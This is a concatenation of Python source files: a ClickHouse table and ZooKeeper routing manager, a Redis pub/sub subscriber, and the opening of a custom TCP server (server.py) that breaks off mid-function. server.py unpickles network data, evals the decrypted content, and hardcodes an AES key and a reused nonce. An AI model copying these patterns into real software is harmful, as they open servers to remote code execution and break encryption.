各个节点间表校验,包括存在性和一致性
:param replicated_table: 本地复制表
:param distributed_table: 全局分布式表
:param client: clickhouse客户端
:param db_name: 库名
:return: True/False
"""
# 校验是否建表成功且一致
created = check_table_exists(client, db_name, distributed_table, replicated_table)
consistency = check_table_consistency(client, db_name, distributed_table, replicated_table)[CONSISTENCY]
if not (created and consistency):
raise ClickHousePrepareException(message=f"是否建表成功: {created}, 各表是否一致: {consistency}")
def alter_fields(client, db_name, distributed_table, replicated_table, inner_cluster, append_fields, delete_fields):
"""
增减字段
:param replicated_table: 本地复制表
:param distributed_table: 全局分布式表
:param client: clickhouse客户端
:param db_name: 库名
:param inner_cluster: ck集群的内部逻辑集群
:param append_fields: 待添加字段
:param delete_fields: 待删除字段
"""
adds = [ADD_COLUMN_SQL.format(e) for e in append_fields]
drops = [DROP_COLUMN_SQL.format(e) for e in delete_fields]
alter = ", ".join(adds + drops)
# 变更复制表
sql = ALTER_TABLE_SQL.format(db_name, replicated_table, inner_cluster, alter)
client.execute(sql)
# 变更分布式表
sql = ALTER_TABLE_SQL.format(db_name, distributed_table, inner_cluster, alter)
client.execute(sql)
def create_table(rt_info):
"""
创建clickhouse物理表,包括分布式表和复制表
建表规则:存在dteventtimestamp字段, 则添加__time字段, 并且基于__time设置ttl和partition by,order by, sample by;
不存在,则只设置order by, 不设置ttl, sample by, partition by
:param rt_info: rt的字段和配置信息
:return: 执行结果
"""
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
try:
rt_id = rt_info[RESULT_TABLE_ID]
ck = rt_info[STORAGES][CLICKHOUSE]
storage_config = json.loads(ck[STORAGE_CONFIG])
processing_type = rt_info[PROCESSING_TYPE]
rt_fields = rt_info[FIELDS]
# 建库
sql = CREATE_DB_SQL.format(db_name, inner_cluster)
client.execute(sql)
# 建复制表
order_list = [e.lower() for e in storage_config.get(ORDER_BY, "")]
field_name_list = construct_fields(rt_fields, processing_type, True)
if not order_list or not set(order_list).issubset(field_name_list):
raise ClickHouseStorageConfigException("order_by必须设置,且字段存在")
fields = ", ".join(construct_fields(rt_fields, processing_type))
if processing_type in [QUERYSET, SNAPSHOT]:
order_by = ORDER_BY_SQL.format(", ".join(order_list)) # 分区内部数据排序和主键
partition_by = EMPTY_STRING
sample_by = EMPTY_STRING
ttl_by = EMPTY_STRING # 数据保存时间
else:
order_list.insert(0, PARTITION_TIME)
order_by = ORDER_BY_SQL.format(", ".join(order_list))
partition_by = PARTITION_BY_SQL
sample_by = SAMPLE_BY_SQL
ttl_by = TTL_BY_SQL.format(translate_expires_day(ck[EXPIRES]))
sql = CREATE_REPLICATED_TABLE_SQL.format(
db_name,
replicated_table,
inner_cluster,
fields,
db_name,
replicated_table,
order_by,
partition_by,
sample_by,
ttl_by,
)
logger.info(f"{rt_id}: create clickhouse replicated_table: {sql}")
client.execute(sql)
# 建分布式表
sql = CREATE_DISTRIBUTED_TABLE_SQL.format(
db_name, distributed_table, inner_cluster, fields, inner_cluster, db_name, replicated_table
)
logger.info(f"{rt_id}: create clickhouse distributed_table: {sql}")
client.execute(sql)
check_tables(client, db_name, distributed_table, replicated_table)
except Exception as e:
logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to create table", exc_info=True)
raise e
finally:
client.disconnect()
def prepare(rt_info):
"""
准备rt关联的clickhouse存储(创建新库表或旧表新增字段), 用途:
1)create:任何节点上的分布式表或者复制表不存在,执行后将采用rt配置创建(注:不能处理复制表被改名的情形);
2)alter: 如果rt字段发生增减,则ck物理表字段也随之增减;如果数据保存周期变化,则ck物理表ttl随之变更
:param rt_info: rt的配置信息
:return: True/False
"""
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
try:
if not check_table_exists(client, db_name, distributed_table, replicated_table):
create_table(rt_info)
else:
alter_table(rt_info)
# 同步zk
sync_zk_table_whitelist(rt_info)
return True
except Exception as e:
logger.warning(f"{rt_info[RESULT_TABLE_ID]}: failed to prepare", exc_info=True)
raise e
finally:
client.disconnect()
def maintain(rt_info):
"""
维护clickhouse table的数据保存周期
:param rt_info: rt的配置信息
"""
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
try:
set_expire(
client,
db_name,
replicated_table,
inner_cluster,
rt_info[PROCESSING_TYPE],
rt_info[STORAGES][CLICKHOUSE][EXPIRES],
)
except Exception as e:
logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to maintain", exc_info=True)
raise e
finally:
client.disconnect()
def maintain_all():
"""
根据用户设定的数据保留时间维护clickhouse表数据保留规则
:return: True
"""
start = time.time()
cluster_list = model_manager.get_storage_cluster_configs_by_type(CLICKHOUSE)
check_threads = []
for cluster in cluster_list:
cluster_name = cluster[CLUSTER_NAME]
thread = threading.Thread(target=maintain_clickhouse_cluster, name=cluster_name, args=(cluster_name,))
# 设置线程为守护线程,主线程结束后,结束子线程
thread.setDaemon(True)
check_threads.append(thread)
thread.start()
for th in check_threads:
th.join(timeout=CLICKHOUSE_MAINTAIN_TIMEOUT)
end = time.time()
logger.info(f"clickhouse maintain_all total time: {(end - start)}(s)")
return True
def maintain_clickhouse_cluster(cluster_name):
"""
维护单个clickhouse集群
:param cluster_name: 集群名
"""
storage_rt_list = model_manager.get_storage_rt_objs_by_name_type(cluster_name, CLICKHOUSE)
for rt_storage in storage_rt_list:
try:
rt_info = util.get_rt_info(rt_storage.result_table_id)
maintain(rt_info)
except Exception as e:
logger.warning(
f"{rt_storage.storage_cluster_config.cluster_name}: failed to maintain the retention rule of "
f"datasource {rt_storage.physical_table_name}, exception: {str(e)}"
)
def construct_fields(rt_fields, processing_type, only_name=False):
"""
:param only_name: 是否只返回字段名列表
:param processing_type: rt的数据来源类型,包括snapshot, clean, batch等
:param rt_fields: rt的字段信息信息
:return: 一个字典,包含连接clickhouse所需的配置
"""
fields = []
if processing_type in [QUERYSET, SNAPSHOT]:
for field in rt_fields:
col_name, col_type = field[FIELD_NAME].lower(), RT_TYPE_TO_CLICKHOUSE_MAPPING[field[FIELD_TYPE].lower()]
fields.append(f"{col_name} {col_type}")
else:
for field in rt_fields:
col_name, col_type = field[FIELD_NAME].lower(), RT_TYPE_TO_CLICKHOUSE_MAPPING[field[FIELD_TYPE].lower()]
if col_name not in ClICKHOUSE_EXCEPT_FIELDS:
fields.append(f"{col_name} {col_type}")
fields = fields + ClICKHOUSE_DEFAULT_COLUMNS
if only_name:
return [e.split(" ")[0] for e in fields]
return fields
def delete(rt_info, delete_schema=True):
"""
清空数据, 并删除表结构
:param delete_schema: 是否删除表结构
:param rt_info: 结果表
:return:
"""
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
try:
if delete_schema:
sql = DROP_TABLE_SQL.format(db_name, distributed_table, inner_cluster)
client.execute(sql)
sql = DROP_TABLE_SQL.format(db_name, replicated_table, inner_cluster)
client.execute(sql)
return not check_table_exists(client, db_name, distributed_table, replicated_table)
else:
sql = TRUNCATE_TABLE_SQL.format(db_name, replicated_table, inner_cluster)
client.execute(sql)
return True
except Exception as e:
logger.warning(f"{rt_info[RESULT_TABLE_ID]}: drop or truncate table failed", exc_info=True)
raise e
finally:
client.disconnect()
def add_index(rt_info, params):
"""
创建跳数索引
:param rt_info: 结果表信息
:param params: 参数
:return:
"""
index_name, expression, index_type, granularity = (
params[NAME],
params[EXPRESSION],
params[INDEX_TYPE],
params[GRANULARITY],
)
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
try:
sql = ALTER_INDEX_SQL.format(
db_name, replicated_table, inner_cluster, index_name, expression, index_type, granularity
)
logger.info(f"{rt_info[RESULT_TABLE_ID]}: going to add index, sql: {sql}")
client.execute(sql)
return True
except Exception as e:
logger.warning(f"{rt_info[RESULT_TABLE_ID]}: add index failed", exc_info=True)
raise ClickHouseAddIndexException(message_kv={MESSAGE: str(e)})
finally:
client.disconnect()
def drop_index(rt_info, index_name):
"""
创建跳数索引
:param rt_info: 结果表信息
:param index_name: 索引名称
:return:
"""
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
try:
sql = DROP_INDEX_SQL.format(db_name, replicated_table, inner_cluster, index_name)
logger.info(f"{rt_info[RESULT_TABLE_ID]}: going to drop index, sql: {sql}")
client.execute(sql)
return True
except Exception as e:
logger.warning(f"{rt_info[RESULT_TABLE_ID]}: drop index failed", exc_info=True)
raise ClickHouseDropIndexException(message_kv={MESSAGE: str(e)})
finally:
client.disconnect()
def check_table_exists(client, db_name, distributed_table, replicated_table):
"""
校验建表是否存在,包括复制表和分布式表, 只要存在任何一个节点有表不存在就算作总体上不存在
:param replicated_table: 本地复制表
:param distributed_table: 全局分布式表
:param client: clickhouse客户端
:param db_name: 库名
:return: True/False
"""
resultSet = client.execute(QUERY_CLUSTER_SQL)
for result in resultSet:
if not table_exists(result[0], int(result[1]), db_name, distributed_table, replicated_table):
return False
return True
def table_exists(host, port, db_name, distributed_table, replicated_table):
"""
检查表是否存在
:param host: host
:param port: 端口
:param replicated_table: 本地复制表
:param distributed_table: 全局分布式表
:param db_name: 库名
"""
client = None
try:
client = build_client(host, port)
sql = CHECK_TABLE_EXIST_SQL.format(db_name, distributed_table, replicated_table)
if len(client.execute(sql)) != 2:
return False
finally:
if not client:
client.disconnect()
return True
def check_table_consistency(client, db_name, distributed_table, replicated_table):
"""
校验每个节点上的表结构是否一致
:param replicated_table: 本地复制表
:param distributed_table: 全局分布式表
:param client: clickhouse客户端
:param db_name: 库名
:return: 一致性结果
"""
resultSet = client.execute(QUERY_CLUSTER_SQL)
schemas = {}
hash_code = 0
for result in resultSet:
host, port = result[0], int(result[1])
inner_client = build_client(host, port)
try:
program = f"{host}:{port}"
schemas[program] = {}
sql = SHOW_SCHEMA_SQL.format(db_name, distributed_table)
schema = get_table_schema(inner_client, sql)
schemas[program][DISTRIBUTED_TABLE] = schema
hash_code = hash_code ^ hash(schema)
sql = SHOW_SCHEMA_SQL.format(db_name, replicated_table)
schema = get_table_schema(inner_client, sql)
schemas[program][REPLICATED_TABLE] = schema
hash_code = hash_code ^ hash(schema)
finally:
inner_client.disconnect()
consistency = True if hash_code == 0 else False
return {CONSISTENCY: consistency, SCHEMAS: schemas}
def check_schema(rt_info):
"""
校验RT的字段与ck物理存储字段是否匹配
:param rt_info: rt的配置信息
:return: rt字段和存储字段的schema对比
"""
client, db_name, _, replicated_table, _ = common_initial(rt_info)
try:
result = {RT_FIELDS: {}, CLICKHOUSE_FIELDS: {}, CHECK_RESULT: True, CHECK_DIFF: {}}
for field in rt_info[FIELDS]:
if field[FIELD_NAME].lower() in ClICKHOUSE_EXCEPT_FIELDS:
continue
result[RT_FIELDS][field[FIELD_NAME].lower()] = field[FIELD_TYPE].lower()
# 表字段信息
sql = QUERY_FIELDS_SQL.format(db_name, replicated_table)
for cell in client.execute(sql):
field_name, file_type = cell[0], cell[1]
if field_name.lower() in ClICKHOUSE_EXCEPT_FIELDS:
continue
result[CLICKHOUSE_FIELDS][field_name.lower()] = file_type
append_fields, delete_fields, bad_fields = check_rt_clickhouse_fields(
result[RT_FIELDS], result[CLICKHOUSE_FIELDS]
)
result[CHECK_DIFF] = {APPEND_FIELDS: append_fields, DELETE_FIELDS: delete_fields, BAD_FIELDS: bad_fields}
if bad_fields:
result[CHECK_RESULT] = False
logger.warning(f"{rt_info[RESULT_TABLE_ID]} diff between rt fields and ck fields: {result}")
return result
except Exception as e:
logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to create table", exc_info=True)
raise e
finally:
client.disconnect()
def check_rt_clickhouse_fields(rt_table_columns, clickhouse_columns):
"""
对比rt的字段,和clickhouse物理表字段的区别
:param rt_table_columns: rt的字段转换为clickhouse中字段后的字段信息
:param clickhouse_columns: clickhouse物理表字段
:return: (append_fields, bad_fields),需增加的字段 和 需要删除的字段
"""
append_fields, bad_fields, delete_fields = [], {}, []
for key, value in rt_table_columns.items():
col_name, col_type = key.lower(), value.lower()
if col_name in clickhouse_columns:
if RT_TYPE_TO_CLICKHOUSE_MAPPING[col_type] != clickhouse_columns[col_name]:
bad_fields[col_name] = "difference between rt and clickhouse({} != {})".format(
col_type, clickhouse_columns[col_name]
)
else:
append_fields.append(f"{col_name} {RT_TYPE_TO_CLICKHOUSE_MAPPING[col_type]}")
delete_fields = list(set(clickhouse_columns.keys()).difference(set(rt_table_columns.keys())))
if PARTITION_TIME in delete_fields:
delete_fields.remove(PARTITION_TIME)
return append_fields, delete_fields, bad_fields
def clusters():
"""
获取clickhouse存储集群列表
:return: clickhouse存储集群列表
"""
result = model_manager.get_storage_cluster_configs_by_type(CLICKHOUSE)
return result
@contextlib.contextmanager
def open_zk(hosts):
command_retry = kazoo.retry.KazooRetry()
connection_retry = kazoo.retry.KazooRetry()
zk = kazoo.client.KazooClient(hosts=hosts, connection_retry=connection_retry, command_retry=command_retry)
zk.start()
try:
yield zk
finally:
zk.stop()
def sync_zk_table_whitelist(rt_info):
"""
同步zk
:param rt_info: 结果表信息
"""
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
ck = rt_info[STORAGES][CLICKHOUSE]
conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
result_set = client.execute(QUERY_CLUSTER_SQL)
hosts = [result[0] for result in result_set]
if not hosts:
logger.error(f"{rt_info[RESULT_TABLE_ID]}: not found host list, {QUERY_CLUSTER_SQL}")
raise ClickHouseConfigException(message_kv={MESSAGE: "not found host list"})
path = CK_TB_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], rt_info[RESULT_TABLE_ID])
with open_zk(conn[ZK_ADDRESS]) as zk:
set_zk_data(zk, path, json.dumps(hosts))
def set_zk_data(zk_client, path, data):
"""
设置zk值
:param zk_client: zk连接
:param path: 路径
:param data: 数据
"""
logger.info(f"{zk_client.hosts}: going to set {data} for {path}")
# 节点是否存在, 不存在则创建
zk_client.ensure_path(path)
if zk_client.exists(path):
zk_client.set(path, data)
else:
zk_client.create(path, data, ephemeral=True)
def read_zk_data(zk_client, path):
"""
读取zk节点信息
:param zk_client: zk客户端
:param path: 路径
"""
if not zk_client.exists(path, watch=None):
raise ClickHouseConfigException(message_kv={MESSAGE: f"{path}: not found path of ck config"})
data, stat = zk_client.get(path, watch=None)
if not data:
raise ClickHouseConfigException(message_kv={MESSAGE: f"{path}: has no ck config"})
logger.info(f"{zk_client.hosts}: content is {data}, {path}")
return data
def read_node_data(zk_client, path):
"""
读取节点信息
:param zk_client: zk客户端
:param path: 路径
"""
result = dict()
try:
data = read_zk_data(zk_client, path)
data_dict = json.loads(data)
# 检查更新时间,若超过2小时,则告警
threshold = int(time.time()) * 1000 - 2 * 60 * 60 * 1000
if threshold > data_dict[TIMESTAMP]:
raise ClickHouseConfigException(
message_kv={MESSAGE: f"{path}: last mtime {data_dict[TIMESTAMP]} < threshold time {threshold}"}
)
result = data_dict
except Exception:
msg = f"{path}: failed to query path weight config, {traceback.format_exc(1000)}"
logger.error(msg)
util.wechat_msg(RTX_RECEIVER, msg)
return result
def read_tb_data(zk_client, path):
"""
读取节点表信息
:param zk_client: zk客户端
:param path: 路径
"""
data_list = list()
try:
data = read_zk_data(zk_client, path)
data_list = json.loads(data)
except Exception as e:
msg = f"{path}: failed to query path table config, {traceback.format_exc(1000)}"
logger.error(msg)
util.wechat_msg(RTX_RECEIVER, msg)
raise e
return data_list
def weights(rt_info):
"""
获取权重信息
:param rt_info: rt的配置信息
"""
result = {WEIGHTS: {}}
try:
ck = rt_info[STORAGES][CLICKHOUSE]
conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
# 获取节点列表
result_set = client.execute(QUERY_CLUSTER_SQL)
hosts = {rs[0]: int(rs[1]) for rs in result_set}
# 获取zk节点权重信息,并计算权重比例
if not hosts:
msg = f"{rt_info[RESULT_TABLE_ID]}: not found host list, {QUERY_CLUSTER_SQL}"
logger.error(msg)
util.wechat_msg(RTX_RECEIVER, msg)
raise ClickHouseConfigException(message_kv={MESSAGE: msg})
with open_zk(conn[ZK_ADDRESS]) as zk:
# 获取表白名单列表
table_white_list = read_tb_data(
zk, CK_TB_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], rt_info[RESULT_TABLE_ID])
)
# 获取本地表列表
table_host_list = [
host
for host, port in hosts.items()
if table_exists(host, port, db_name, distributed_table, replicated_table)
]
# 可用该表的节点列表,需要有表权限和本地表同时满足
sum_weight = 0
avi_table_hosts = [t_h for t_h in table_host_list if (t_h in hosts.keys() and t_h in table_white_list)]
for host in avi_table_hosts:
data = read_node_data(zk, CK_NODE_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], host))
if not data:
logger.warning(f"{host}: failed to query node data")
continue
weight = data[FREE_DISK] * data[FACTOR]
if data[ENABLE] and weight > FUSING_THRESHOLD:
result[TIMESTAMP] = data[TIMESTAMP]
result[WEIGHTS][f"{host}:{conn[HTTP_PORT]}"] = weight
sum_weight += weight
else:
# 节点不可用,容量低于熔断阀值(200),此处依赖容量告警
logger.error(
"{}: disk free {} lte fusing threshold {} or not enable".format(
host, data[FREE_DISK], FUSING_THRESHOLD
)
)
# 计算占比
for host, weight in result[WEIGHTS].items():
result[WEIGHTS][host] = int(weight * 100 / sum_weight)
except Exception:
msg = f"{rt_info[RESULT_TABLE_ID]}: failed to query weights, {traceback.format_exc(1000)}"
logger.error(msg)
util.wechat_msg(RTX_RECEIVER, msg)
return result
def route_config(rt_info):
"""
获取zk配置信息
:param rt_info: rt的配置信息
"""
result = {NODES: [], TABLE: []}
ck = rt_info[STORAGES][CLICKHOUSE]
conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
# 获取节点列表
result_set = client.execute(QUERY_CLUSTER_SQL)
hosts = [rs[0] for rs in result_set]
if not hosts:
msg = f"{rt_info[RESULT_TABLE_ID]}: not found host list, {QUERY_CLUSTER_SQL}"
logger.error(msg)
raise ClickHouseConfigException(message_kv={MESSAGE: msg})
with open_zk(conn[ZK_ADDRESS]) as zk:
for host in hosts:
data = read_node_data(zk, CK_NODE_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], host))
result[NODES].append({host: data})
result[TABLE] = read_tb_data(
zk, CK_TB_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], rt_info[RESULT_TABLE_ID])
)
return result
def set_route_config(rt_info, params):
"""
设置zk配置
:param rt_info: rt的配置信息
:param params: 参数
"""
ck = rt_info[STORAGES][CLICKHOUSE]
conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
with open_zk(conn[ZK_ADDRESS]) as zk:
if params[TYPE] == NODES:
path = CK_NODE_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], params[IP])
data = read_node_data(zk, path)
for k in [FACTOR, ENABLE, FREE_DISK]:
if k in params:
data[k] = params[k]
data[TIMESTAMP] = int(time.time()) * 1000
set_zk_data(zk, path, json.dumps(data))
else:
path = CK_TB_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], rt_info[RESULT_TABLE_ID])
hosts = params[HOSTS].split(",")
set_zk_data(zk, path, json.dumps(hosts))
|
subscriber.py | # -*- coding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Ivo Tzvetkov
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from redis import StrictRedis
from threading import Thread, Event
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
from .exc import *
__all__ = ['Subscriber']
LOOP_TIMEOUT = 0.01
class ThreadEvents(object):
def __init__(self):
self.terminate = Event()
self.terminated = Event()
self.exception = None
class Subscriber(object):
def __init__(self, redis=None, **redis_config):
self.redis = redis if redis is not None else StrictRedis(**redis_config)
self.pubsub = self.redis.pubsub(ignore_subscribe_messages=True)
self.channel = None
def subscribe(self, channel):
if self.channel is not None:
raise ChannelError('already subscribed to a channel')
self.pubsub.subscribe('redmsg:' + channel)
self.channel = channel
def unsubscribe(self, channel):
if self.channel is None:
raise ChannelError('not subscribed to a channel')
self.pubsub.unsubscribe('redmsg:' + channel)
self.channel = None
def process_message(self, message):
txid, data = message['data'].decode('utf-8').split(':', 1)
return {
'channel': message['channel'].decode('utf-8')[7:],
'txid': int(txid),
'data': data
}
def listen(self):
if self.channel is None:
raise ChannelError('not subscribed to a channel')
for message in self.pubsub.listen():
yield self.process_message(message)
def _listener_thread(self, queue, events):
try:
while not events.terminate.is_set():
message = self.pubsub.get_message(timeout=LOOP_TIMEOUT)
if message is not None:
queue.put(self.process_message(message))
except Exception as e:
events.exception = e
finally:
events.terminated.set()
def _loader_thread(self, queue, events, txid, batch_size, ignore_missing=False):
try:
listener_queue = Queue()
listener_events = ThreadEvents()
listener_thread = Thread(target=self._listener_thread, args=(listener_queue, listener_events))
listener_thread.daemon = True
listener_thread.start()
latest = -1
current = txid
loaded = batch_size
while (loaded == batch_size or (ignore_missing and loaded > 0)) and not events.terminate.is_set():
loaded = 0
keys = ['redmsg:{0}:{1}'.format(self.channel, current + i) for i in range(batch_size)]
for idx, data in enumerate(self.redis.mget(keys)):
if data is None:
if ignore_missing:
continue
else:
break
else:
latest = current + idx
queue.put({
'channel': self.channel,
'txid': latest,
'data': data.decode('utf-8')
})
loaded += 1
current += batch_size
if not ignore_missing and latest == -1 and not events.terminate.is_set():
raise MissingTransaction('txid not found: {0}'.format(txid))
while not events.terminate.is_set() and not listener_events.terminated.is_set():
try:
message = listener_queue.get(timeout=LOOP_TIMEOUT)
if message['txid'] > latest:
if not ignore_missing:
if message['txid'] != (latest + 1):
raise MissingTransaction('missing txid: {0}'.format(latest + 1))
else:
latest = message['txid']
queue.put(message)
except Empty:
pass
except Exception as e:
events.exception = e
finally:
if listener_thread.is_alive():
listener_events.terminate.set()
listener_events.terminated.wait()
if listener_events.exception:
events.exception = listener_events.exception
events.terminated.set()
def listen_from(self, txid, batch_size=100, ignore_missing=False):
if self.channel is None:
raise ChannelError('not subscribed to a channel')
txid = int(txid)
loader_queue = Queue()
loader_events = ThreadEvents()
loader_thread = Thread(target=self._loader_thread, args=(loader_queue, loader_events, txid, batch_size, ignore_missing))
loader_thread.daemon = True
loader_thread.start()
try:
while not loader_events.terminated.is_set():
try:
yield loader_queue.get(timeout=LOOP_TIMEOUT)
except Empty:
pass
finally:
if loader_thread.is_alive():
loader_events.terminate.set()
loader_events.terminated.wait()
if loader_events.exception:
raise loader_events.exception
|
server.py | from re import S
import select
import socket
import queue
import threading
import sys
import pickle
import base64
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.serialization import load_ssh_public_key
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
import hashlib
import yaml
import random
import time
class IPNC():
def __init__(self):
pass
def _read_yml(self,file = None):
with open(file) as file:
documents = yaml.full_load(file)
return documents
def _write_yml(self,file = None, dict_data = None,mode = "a+"):
with open(file, mode) as file:
yaml.dump(dict_data, file)
def _add_node(self,file = None, node = None):
try:
read = self._read_yml(file)
if read != None:
read[node[0]]
self._change_node_value(file,node)
else:
raise KeyError
except KeyError:
node_dict = {
node[0] : node[1]
}
self._write_yml(file, node_dict)
def _change_node_value(self,file = None, node = None):
r_yml = self._read_yml(file)
r_yml[node[0]] = node[1]
self._write_yml(file = file, dict_data = r_yml, mode = "w")
def _get_node(self,file = None, key = None, wait = True):
if key == None:
return self._read_yml(file)
if wait:
while True:
r_yml = self._read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
pass
except TypeError:
pass
else:
r_yml = self._read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
return None
except TypeError:
pass
def _remove_node(self,file,node):
try:
r_yml = self._read_yml(file = file)
r_yml[node]
r_yml.pop(node)
self._write_yml(file = file, dict_data = r_yml, mode = "w")
except KeyError:
return False
except:
pass
def _name_generator(self,_len_ = 16, onlyText = False):
lower_case = list("abcdefghijklmnopqrstuvwxyz")
upper_case = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
special = list("!@#$%&*?")
number = list("0123456789")
if onlyText:
_all_ = lower_case + upper_case
else:
_all_ = lower_case + upper_case + special + number
random.shuffle(_all_)
return "".join(random.sample(_all_,_len_))
class DSP():
def __init__(
self,
msg : str = None,
DSP_type : str = None,
device_id : int = None,
universalAesKey : bytes = None,
nonce : bytes = None,
aad : str = None,
):
if msg is not None:
self.msg = msg
else:
self.msg = msg
self.DSP_type = DSP_type
self.device_id = device_id
if universalAesKey is not None:
self.UNIVERSAL_AES_KEY = universalAesKey
else:
self.UNIVERSAL_AES_KEY = b't\x89\xcc\x87\xcca\xe8\xfb\x06\xed\xcf+\x0eVB\xd2\xd3\xbeMk\xfa\xd1J\xa7\xc8@\xf8\x05\x0f\xfc\x18\x00'
if nonce is not None:
self.NONCE = nonce
else:
self.NONCE = b'\xfe\x1e1\xc0\xfc`s\xbc6\x9fQ\xb2'
if aad is not None:
self.AAD = aad
else:
self.AAD = b"au$tica&tedbut@u32nencr#cdscypteddatafdrj"
def _messanger(self,MSG = None):
if MSG is not None:
self.msg = MSG
data = f'DSP("{self.msg}","{self.DSP_type}")'
data = pickle.dumps(data)
pickled_data = data
encrypted_data = [self.device_id, self.__encrypt(pickled_data)]
p_e_d = pickle.dumps(encrypted_data)
ret = base64.b64encode(p_e_d)
return ret
def __repr__(self):
return "_main.DSP._"
def __encrypt(self,data):
aesgcm = AESGCM(self.UNIVERSAL_AES_KEY,)
ct = aesgcm.encrypt(
self.NONCE,
data,
self.AAD
)
return ct
def _convert_to_class(self,OBJECT : bytes = None,secure : bool = True, secure_dict : list = None):
try:
OBJECT = base64.b64decode(OBJECT)
OBJECT = pickle.loads(OBJECT)
if secure == True:
if secure_dict is None:
raise TypeError(
"convert_to_class() missing 1 required positional argument: 'secure_lst'")
else:
secure_dict = pickle.loads(base64.b64decode(secure_dict))
aesgcm = AESGCM(secure_dict["aes_key"])
ct = aesgcm.decrypt(
secure_dict["nonce"], OBJECT[-1], secure_dict["aad"])
ct = pickle.loads(ct)
return eval(ct)
else:
aesgcm = AESGCM(self.UNIVERSAL_AES_KEY)
ct = aesgcm.decrypt(self.NONCE, OBJECT[-1], self.AAD)
ct = pickle.loads(ct)
return eval(ct)
except TypeError:
sys.exit()
except ValueError:
print("sender has not done the handshake")
class MAIN(IPNC):
def __init__(self,secure : bool = True,file = None):
"""async_server initializer class that will create the a asyncronouse tcp server.
"""
IPNC.__init__(self)
self.__secure = secure
self.__file_location = file
self.READABLE = []
self.WRITABLE = []
self.INPUTS = []
self.OUTPUTS = []
self.MESSAGE_QUEUES = {}
self.REQUEST_LIST = []
self.REQUEST_RESPONSE_LIST = []
self.MESSAGE_LIST = []
self.__VARIFIED_DEVICES = []
self.__CLIENT_KEYS = {}
self.__CUSTOM_CHANNEL = []
self.__CUSTOM_CHANNEL_MSG_REC = []
self.__CUSTOM_CHANNEL_MSG_SEND = []
self.__VARIFIER_LIST = []
self.__CALLBACK_LOOP = []
self.__RECEIVING_MSG = []
get = self._get_node(file = self.__file_location,key = hashlib.sha256(bytes("key", "utf-8")).digest(), wait = False)
if get is not None:
self.__CLIENT_KEYS = get
self.__VARIFIED_DEVICES.extend(list(get.keys()))
def SERVER(self,address : str = None, port : int = None, listeners : int = None):
self.address = address
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt( socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 )
self.sock.setblocking(0)
self.sock.bind((self.address,self.port))
self.sock.listen(listeners)
print("[SERVER IS ACTIVATED | LISTENING]")
self.INPUTS.append(self.sock)
thread1 = threading.Thread(
target = self.receive_func,
args = (
self.__RECEIVING_MSG,
self.__VARIFIED_DEVICES,
self.__VARIFIER_LIST,
self.__CLIENT_KEYS,
self.OUTPUTS,
self.REQUEST_LIST,
self.REQUEST_RESPONSE_LIST,
self.MESSAGE_LIST,
self.__CUSTOM_CHANNEL_MSG_REC,
)
)
thread2 = threading.Thread(
target = self.send_func,
args = (
self.WRITABLE,
self.MESSAGE_QUEUES,
self.MESSAGE_LIST,
self.REQUEST_LIST,
self.REQUEST_RESPONSE_LIST,
self.__VARIFIER_LIST,
self.__CUSTOM_CHANNEL_MSG_SEND
)
)
thread3 = threading.Thread(
target = self.__callback_loop,
args = (
self.__CALLBACK_LOOP,
)
)
thread1.daemon = True
thread1.start()
thread2.daemon = True
thread2.start()
thread3.daemon = True
thread3.start()
thread = threading.Thread(target = self.__server)
thread.daemon = True
thread.start()
def __server(self):
data_recv_len = []
while True:
